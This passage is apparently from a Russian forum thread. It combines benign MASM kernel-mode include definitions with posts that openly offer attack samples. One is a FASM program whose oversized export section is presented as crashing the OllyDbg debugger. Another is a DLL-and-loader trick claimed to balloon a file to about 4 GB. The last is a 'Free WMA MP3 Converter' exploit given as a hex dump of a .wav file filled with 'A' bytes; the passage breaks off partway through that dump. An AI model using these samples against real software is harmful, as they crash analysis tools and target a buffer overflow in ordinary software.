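; for 32-bit MASM kernel-mode sources (flat model, stdcall).
; All pointer types are 32 bits wide in this model.
; ---------------------------------------------------------------------------

TRUE                    equ 1
FALSE                   equ 0
NULL                    equ 0

; --- scalar and pointer aliases ---------------------------------------------
NTSTATUS                typedef DWORD

CHAR                    typedef BYTE
PCHAR                   typedef PTR BYTE
UCHAR                   typedef BYTE
PUCHAR                  typedef PTR BYTE
WCHAR                   typedef WORD

CALLBACK                typedef proto STDCALL
WINAPI                  typedef proto STDCALL
NTAPI                   typedef proto STDCALL

BOOL                    typedef DWORD
BOOLEAN                 typedef BYTE
PBOOLEAN                typedef PTR BYTE

PBYTE                   typedef PTR BYTE
PWORD                   typedef PTR WORD        ; was "PTR DORD", which is not a MASM type
PDWORD                  typedef PTR DWORD
PVOID                   typedef PTR
PCVOID                  typedef PTR

PSTR                    typedef PTR BYTE
PCSTR                   typedef PTR BYTE
PWSTR                   typedef PTR WORD
PSZ                     typedef PTR BYTE
PCSZ                    typedef PTR BYTE

PDWORD_PTR              typedef PTR DWORD
UINT                    typedef DWORD
LONG                    typedef SDWORD
PLONG                   typedef PTR SDWORD
ULONG                   typedef DWORD
PULONG                  typedef PTR DWORD
; USHORT was declared twice in a row; one declaration is enough.
; NOTE(review): the second line may have been meant as PUSHORT -- confirm before adding it.
USHORT                  typedef WORD
DOUBLE                  typedef QWORD

HANDLE                  typedef DWORD
HFILE                   typedef DWORD

; --- counted strings --------------------------------------------------------
; Guarded so that a file which already declared UNICODE_STRING (for example a
; string-macro include) does not collide with this definition.
IFNDEF UNICODE_STRING
UNICODE_STRING STRUCT
    woLength            WORD    ?
    MaximumLength       WORD    ?
    Buffer              PWSTR   ?
UNICODE_STRING ENDS
PUNICODE_STRING         typedef PTR UNICODE_STRING
ENDIF

_STRING STRUCT
    woLength            WORD    ?
    MaximumLength       WORD    ?
    Buffer              DWORD   ?
_STRING ENDS
PSTRING                 typedef PTR _STRING

; --- 64-bit integers --------------------------------------------------------
; The parts are reachable directly (anonymous struct), through ".u", or as a
; single QWORD.
LARGE_INTEGER UNION
    struct
        LowPart         DWORD   ?
        HighPart        DWORD   ?
    ends
    struct u
        LowPart         DWORD   ?
        HighPart        DWORD   ?
    ends
    QuadPart            QWORD   ?
LARGE_INTEGER ENDS
PLARGE_INTEGER          typedef PTR LARGE_INTEGER

ULARGE_INTEGER UNION
    struct
        LowPart         DWORD   ?
        HighPart        DWORD   ?
    ends
    struct u
        LowPart         DWORD   ?
        HighPart        DWORD   ?
    ends
    QuadPart            QWORD   ?
ULARGE_INTEGER ENDS
PULARGE_INTEGER         typedef PTR ULARGE_INTEGER

; --- linked lists -----------------------------------------------------------
LIST_ENTRY STRUCT
    Flink               DWORD   ?
    Blink               DWORD   ?
LIST_ENTRY ENDS
PLIST_ENTRY             typedef PTR LIST_ENTRY

SINGLE_LIST_ENTRY STRUCT
    Next                DWORD   ?
SINGLE_LIST_ENTRY ENDS
PSINGLE_LIST_ENTRY      typedef PTR SINGLE_LIST_ENTRY

; --- object attribute flags -------------------------------------------------
OBJ_INHERIT             equ 00000002h
OBJ_PERMANENT           equ 00000010h
OBJ_EXCLUSIVE           equ 00000020h
OBJ_CASE_INSENSITIVE    equ 00000040h
OBJ_OPENIF              equ 00000080h
OBJ_OPENLINK            equ 00000100h
OBJ_KERNEL_HANDLE       equ 00000200h
OBJ_VALID_ATTRIBUTES    equ 000003F2h

; Field names are plain ASCII. The posted text spelled "SecurityDescriptor"
; with two Cyrillic look-alike letters, which assembles but does not match
; any source that spells the field normally.
OBJECT_ATTRIBUTES STRUCT
    dwLength                    DWORD           ?
    RootDirectory               HANDLE          ?
    ObjectName                  PUNICODE_STRING ?
    Attributes                  DWORD           ?
    SecurityDescriptor          PVOID           ?
    SecurityQualityOfService    PVOID           ?
OBJECT_ATTRIBUTES ENDS
; Pointer type: the PTR keyword was missing, which made this an alias of the
; structure itself instead of a pointer to it.
POBJECT_ATTRIBUTES      typedef PTR OBJECT_ATTRIBUTES

; ---------------------------------------------------------------------------
; $IsAddr2(Operand) -- macro function.
; Returns <-1> when Operand is longer than five characters and starts with
; "addr " (case-insensitive), otherwise <0>.
; ---------------------------------------------------------------------------
$IsAddr2 MACRO Operand:REQ
    local a
    a = 0
    IF @SizeStr(<Operand>) GT 5
        IFIDNI <addr >, @SubStr(<Operand>, 1 , 5)
            a = 1
        ENDIF
    ENDIF
    IF a
        EXITM <-1>
    ELSE
        EXITM <0>
    ENDIF
ENDM

; ---------------------------------------------------------------------------
; InitializeObjectAttributes p, n, a, r, s
;
; Fills the OBJECT_ATTRIBUTES structure designated by p.
;   p  structure to fill: a register, or "addr <variable>"
;   n  ObjectName          (register, "addr <variable>", or memory operand)
;   a  Attributes          (OBJ_* flags: memory operand or constant)
;   r  RootDirectory       (memory operand or constant)
;   s  SecurityDescriptor  (memory operand or constant)
; SecurityQualityOfService is always cleared.
;
; Clobbers: ecx (structure pointer); eax when n is "addr" of a stack variable;
;           flags.
; Depends on $IsStack, which is not defined in this file.
;
; Each field is tested and stored from its own argument. The posted version
; tested and stored r in the Attributes and SecurityDescriptor branches, so a
; constant such as OBJ_KERNEL_HANDLE or OBJ_CASE_INSENSITIVE was silently
; replaced by 0 whenever RootDirectory was NULL, and a non-NULL root handle
; was written into both fields.
; ---------------------------------------------------------------------------
InitializeObjectAttributes MACRO p:REQ, n:REQ, a:REQ, r:REQ, s:REQ
    local adr, reax, recx       ;; recx was missing from the local list (reax appeared twice)

    reax = 0
    recx = 0

    ;; ---- ecx = address of the structure --------------------------------
    IF (OPATTR (p)) AND 00010000y           ;; p is a register
        IFDIFI <p>, <ecx>
            mov ecx, p
        ENDIF
    ELSE
        IF $IsAddr2(p)
            adr SUBSTR <p>, 6               ;; text after "addr "
            IF $IsStack(adr)
                lea ecx, adr
                recx = 1
            ELSE
                mov ecx, offset adr
            ENDIF
        ENDIF
    ENDIF

    PUSHCONTEXT ASSUMES
    assume ecx:ptr OBJECT_ATTRIBUTES

    mov [ecx].dwLength, sizeof OBJECT_ATTRIBUTES

    ;; ---- RootDirectory -------------------------------------------------
    IF (OPATTR (r)) AND 00000010y           ;; r is a memory operand
        push r
        pop [ecx].RootDirectory
    ELSE
        IF r EQ 0
            and [ecx].RootDirectory, 0
        ELSE
            mov [ecx].RootDirectory, r
        ENDIF
    ENDIF

    ;; ---- Attributes ----------------------------------------------------
    IF (OPATTR (a)) AND 00000010y           ;; a is a memory operand
        push a
        pop [ecx].Attributes
    ELSE
        IF a EQ 0
            and [ecx].Attributes, 0
        ELSE
            mov [ecx].Attributes, a
        ENDIF
    ENDIF

    ;; ---- ObjectName ----------------------------------------------------
    IF (OPATTR (n)) AND 00010000y           ;; n is a register
        mov [ecx].ObjectName, n
    ELSE
        IF $IsAddr2(n)
            adr SUBSTR <n>, 6
            IF $IsStack(adr)
                lea eax, adr
                mov [ecx].ObjectName, eax
                reax = 1
            ELSE
                mov [ecx].ObjectName, offset adr
            ENDIF
        ELSEIF (OPATTR (n)) AND 00000010y   ;; n is a memory operand
            push n
            pop [ecx].ObjectName
        ENDIF
    ENDIF

    ;; ---- SecurityDescriptor --------------------------------------------
    IF (OPATTR (s)) AND 00000010y           ;; s is a memory operand
        push s
        pop [ecx].SecurityDescriptor
    ELSE
        IF s EQ 0
            and [ecx].SecurityDescriptor, 0
        ELSE
            mov [ecx].SecurityDescriptor, s
        ENDIF
    ENDIF

    and [ecx].SecurityQualityOfService, 0

    assume ecx:nothing
    POPCONTEXT ASSUMES
ENDM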
ntoskrnl.inc

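; ---------------------------------------------------------------------------
; ntoskrnl.inc -- stdcall prototypes for routines imported from ntoskrnl.
; Every parameter is declared as a DWORD. With stdcall the parameter count
; becomes part of the decorated name, so a wrong count or a misspelled name
; shows up as an unresolved external at link time.
; ---------------------------------------------------------------------------

ZwYieldExecution                PROTO STDCALL
ZwWriteFile                     PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwWaitForSingleObject           PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwWaitForMultipleObjects        PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwUnmapViewOfSection            PROTO STDCALL :DWORD, :DWORD
ZwUnloadKey                     PROTO STDCALL :DWORD
ZwUnloadDriver                  PROTO STDCALL :DWORD
ZwTerminateProcess              PROTO STDCALL :DWORD, :DWORD
ZwSetVolumeInformationFile      PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwSetValueKey                   PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwSetTimer                      PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwSetSystemTime                 PROTO STDCALL :DWORD, :DWORD
ZwSetSystemInformation          PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwSetSecurityObject             PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwSetInformationThread          PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwSetInformationProcess         PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwSetInformationObject          PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwSetInformationFile            PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwSetEvent                      PROTO STDCALL :DWORD, :DWORD
ZwSetEaFile                     PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwSetDefaultUILanguage          PROTO STDCALL :DWORD
ZwSetDefaultLocale              PROTO STDCALL :DWORD, :DWORD
ZwSaveKey                       PROTO STDCALL :DWORD, :DWORD
ZwRestoreKey                    PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwResetEvent                    PROTO STDCALL :DWORD, :DWORD
ZwRequestWaitReplyPort          PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwReplaceKey                    PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwReadFile                      PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryVolumeInformationFile    PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryValueKey                 PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQuerySystemInformation        PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwQuerySymbolicLinkObject       PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwQuerySecurityObject           PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQuerySection                  PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryObject                   PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryKey                      PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryInstallUILanguage        PROTO STDCALL :DWORD
ZwQueryInformationToken         PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryInformationProcess       PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryInformationFile          PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryEaFile                   PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryDirectoryObject          PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryDirectoryFile            PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwQueryDefaultUILanguage        PROTO STDCALL :DWORD
ZwQueryDefaultLocale            PROTO STDCALL :DWORD, :DWORD
ZwPulseEvent                    PROTO STDCALL :DWORD, :DWORD
ZwPowerInformation              PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwOpenTimer                     PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwOpenThreadToken               PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwOpenThread                    PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwOpenSymbolicLinkObject        PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwOpenSection                   PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwOpenProcessToken              PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwOpenProcess                   PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwOpenKey                       PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwOpenFile                      PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwOpenEvent                     PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwOpenDirectoryObject           PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwNotifyChangeKey               PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwMapViewOfSection              PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwMakeTemporaryObject           PROTO STDCALL :DWORD
ZwLoadKey                       PROTO STDCALL :DWORD, :DWORD
ZwLoadDriver                    PROTO STDCALL :DWORD
ZwInitiatePowerAction           PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwFsControlFile                 PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwFreeVirtualMemory             PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwFlushVirtualMemory            PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwFlushKey                      PROTO STDCALL :DWORD
ZwFlushInstructionCache         PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwEnumerateValueKey             PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwEnumerateKey                  PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwDuplicateToken                PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwDuplicateObject               PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwDisplayString                 PROTO STDCALL :DWORD
ZwDeviceIoControlFile           PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwDeleteValueKey                PROTO STDCALL :DWORD, :DWORD
ZwDeleteKey                     PROTO STDCALL :DWORD
ZwDeleteFile                    PROTO STDCALL :DWORD
ZwCreateTimer                   PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwCreateSymbolicLinkObject      PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD
ZwCreateSection                 PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwCreateKey                     PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwCreateFile                    PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwCreateEvent                   PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwCreateDirectoryObject         PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwConnectPort                   PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwCloseObjectAuditAlarm         PROTO STDCALL :DWORD, :DWORD, :DWORD
ZwClose                         PROTO STDCALL :DWORD
ZwClearEvent                    PROTO STDCALL :DWORD
ZwCancelTimer                   PROTO STDCALL :DWORD, :DWORD
ZwCancelIoFile                  PROTO STDCALL :DWORD, :DWORD
ZwAllocateVirtualMemory         PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwAlertThread                   PROTO STDCALL :DWORD
ZwAdjustPrivilegesToken         PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
ZwAccessCheckAndAuditAlarm      PROTO STDCALL :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD, :DWORD

WRITE_REGISTER_USHORT           PROTO STDCALL :DWORD, :DWORD
WRITE_REGISTER_ULONG            PROTO STDCALL :DWORD, :DWORD
WRITE_REGISTER_UCHAR            PROTO STDCALL :DWORD, :DWORD
WRITE_REGISTER_BUFFER_USHORT    PROTO STDCALL :DWORD, :DWORD, :DWORD
WRITE_REGISTER_BUFFER_ULONG     PROTO STDCALL :DWORD, :DWORD, :DWORD
WRITE_REGISTER_BUFFER_UCHAR     PROTO STDCALL :DWORD, :DWORD, :DWORD

; Name written in plain ASCII: the posted text contained two Cyrillic
; look-alike letters inside "Descriptor", which would never match the export.
SeValidSecurityDescriptor       PROTO STDCALL :DWORD, :DWORD

; The posted listing breaks off here, in the middle of the next declaration
; ("SeUnregisterLogonSession..."). The fragment is kept as a comment because a
; bare identifier does not assemble and its parameter list is not shown.
; SeUnregisterLogonSession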
RE: BSOD - 2012-02-12 00:38:55.863333   
Elisaveta

BONUS:
dynamic.dll — динамическая библиотека, созданная при помощи LCC-Win32 Free Compiler(a).
В сочетании с LoadLibraryA при первом запуске сжимается с 12 Kb до 4 Kb, а при втором библа расширяется до 3,99 Гб.

111.c

/* --- Generated from the lcc-win32 wizard template C:\lcc\lib\wizard\dll.tpl. */
#include <windows.h>

/*
 * LibMain -- DLL entry point (lcc-win32 naming), exported from the library.
 *
 * The loader calls it when a process loads or unloads the DLL and when
 * threads are created or destroyed in a process that has the DLL loaded.
 *
 *   hDLLInst     instance handle of the DLL
 *   fdwReason    notification code: DLL_PROCESS_ATTACH, DLL_PROCESS_DETACH,
 *                DLL_THREAD_ATTACH or DLL_THREAD_DETACH
 *   lpvReserved  not used
 *
 * Returns TRUE. The value is only looked at for DLL_PROCESS_ATTACH, where
 * TRUE means the DLL initialised successfully and FALSE means it should be
 * unloaded immediately.
 *
 * This template performs no work for any notification. Whatever is added
 * here runs inside every process that loads the library, before the call
 * that loaded it returns.
 */
BOOL WINAPI __declspec(dllexport) LibMain(HINSTANCE hDLLInst, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason) {
    case DLL_PROCESS_ATTACH:    /* first load into this process: per-process setup goes here */
    case DLL_PROCESS_DETACH:    /* unload from this process: undo the setup; result ignored  */
    case DLL_THREAD_ATTACH:     /* new thread in a process that already loaded the DLL       */
    case DLL_THREAD_DETACH:     /* thread exiting cleanly: per-thread cleanup goes here      */
    default:
        /* nothing to do for any notification */
        break;
    }

    return TRUE;
}
111.prj

; Wedit project file. Syntax: Name = value [111] PrjFiles=1 File1=111.c ProjectFlags=0 Frame=114 110 956 728 StatusBar=0,0,0,0 Name=111 CurrentFile= OpenFiles=0 ProjectPath=C:\lcc\src\1 SourcesDir=C:\lcc\src\1 Defines= IncludeFilesCount=1 IncludeFile0=C:\lcc\include Libraries= LinkerArgs= ProjectTime=258 MakeName=C:\lcc\bin\make.exe MakeDir=C:\lcc\src\1\lcc Exe=c:\lcc\src\1\lcc\111.dll DebuggerArguments= DbgExeName=c:\lcc\src\1\lcc\111.dll DbgDir=c:\lcc\src\1\lcc CompilerFlags=264 Useframework=0 NumberOfBreakpoints=0 ErrorFile=C:\lcc\src\1\lcc\111.err NrOfFileProcessors=0
+LoadLibraryA+.asm

; ---------------------------------------------------------------------------
; MASM32, 32-bit flat model, stdcall.
; Loads and unloads 111.dll, then opens and commits an (empty) resource
; update on the same file, shows a message box and exits.
; ---------------------------------------------------------------------------
.386
.model flat, stdcall
option casemap :none

include     C:\MASM32\INCLUDE\windows.inc
include     C:\MASM32\INCLUDE\user32.inc
include     C:\MASM32\INCLUDE\kernel32.inc

includelib  C:\MASM32\LIB\kernel32.lib
includelib  C:\MASM32\LIB\user32.lib

.data
szMBText    db " Hallo ASM !!!",0
szMBHead    db " My Program",0
lib         db "111.dll",0                  ; file name, resolved relative to the search path / current directory

.code
start:
    mov     esi, offset lib                 ; esi = file name; callee-saved, so it survives the API calls

    ; Map the DLL into this process (its entry point runs here) and drop it again.
    ; NOTE(review): the handle is passed on without a NULL check.
    invoke  LoadLibraryA, esi
    invoke  FreeLibrary, eax

    ; Open the file for resource editing without deleting existing resources
    ; (second argument 0), then close the update with fDiscard = 0. No
    ; UpdateResource call is made in between; with fDiscard = 0 the API is
    ; documented to write the pending state back, so the file on disk is
    ; rewritten. The size change described in the post was not verified.
    ; NOTE(review): the update handle is not checked either.
    invoke  BeginUpdateResourceA, esi, 0
    invoke  EndUpdateResourceA, eax, 0

    test    eax, eax                        ; result is tested, but no branch consumes the flags

    invoke  MessageBox, NULL, ADDR szMBText, ADDR szMBHead, MB_OK
    invoke  ExitProcess, 0
end start
RE: BSOD - 2012-02-12 00:40:27.246666   
Elisaveta

+EXPORT+.ASM OllyDbg buffer overflow
Исходник, добавляющий секцию экспорта в программу. Сносит OllyDbg без плагинов.
(Dbg crash)

; ---------------------------------------------------------------------------
; FASM source for a 32-bit PE GUI program with a hand-written export section.
; The code itself only shows a message box and exits; the point of the sample
; is the export data at the bottom. The post presents the resulting file as
; one that crashes the debugger when it is opened for analysis.
; ---------------------------------------------------------------------------
format PE GUI 4.0
include 'c:\fasm\include\win32ax.inc'

section '.text' data readable executable

  start:
        ; NOTE(review): the trailing comma after MB_OK is reproduced as posted;
        ; it is not confirmed that the line assembles in this form.
        invoke  MessageBox,HWND_DESKTOP," Hallo FASM !!!"," Win32 Assembly",MB_OK,
        invoke  ExitProcess,0

  .end start

section '.data' export data readable

  ; Export data as posted: the module name '*.dll', followed by the current
  ; address ($) and 1024h repetitions of the '.' character.
  ; NOTE(review): presumably the oversized string ends up where a tool expects
  ; a short export name -- not verified from this listing.
  ; For analysis tools the lesson is that names and lengths read from a PE
  ; export table are untrusted input and need a bounds check before copying.
  export '*.dll',\
         $, 1024h dup ('.')
RE: BSOD - 2012-02-12 00:47:40.350000   
Elisaveta

NEW Free WMA MP3 Converter_EXPLOIT:
Ваш,старый,подправленный.wav :

Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F 00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000050 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000070 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000080 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000090 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000000A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000000B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000000C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000000D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000000E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000000F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000100 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000110 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000120 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000130 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000140 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000150 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000160 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000170 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000180 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000190 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000001A0 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000001B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000001C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000001D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000001E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000001F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000200 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000210 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000220 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000230 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000240 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000250 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000260 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000270 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000280 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000290 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000002A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000002B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000002C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000002D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000002E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000002F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000300 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000310 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000320 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000330 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000340 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000350 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000360 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000370 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000380 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000390 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000003A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000003B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000003C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000003D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000003E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000003F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000400 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000410 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000420 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000430 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000440 41 41 41 41 41 41 41 41 41 